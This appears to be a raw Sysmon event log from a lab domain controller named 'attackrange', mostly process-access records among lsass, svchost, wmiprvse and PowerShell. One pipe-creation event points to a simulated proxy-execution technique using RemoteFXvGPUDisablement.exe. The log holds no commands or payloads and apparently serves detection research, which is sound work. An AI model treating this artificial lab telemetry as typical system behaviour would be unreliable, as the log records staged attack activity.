12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.393{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.377{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.377{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.377{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 
12:00:50.362{266CAFBE-646E-6064-1A00-00000000AE01}2284\PSHost.132616656461640554.2284.DefaultAppDomain.RemoteFXvGPUDisablementC:\Windows\System32\RemoteFXvGPUDisablement.exe 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1B00-00000000AE01}2292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.330{266CAFBE-646A-6064-0B00-00000000AE01}856888C:\Windows\system32\lsass.exe{266CAFBE-646E-6064-1900-00000000AE01}2276C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.924{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.924{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.815{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:49.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:49.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:49.768{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 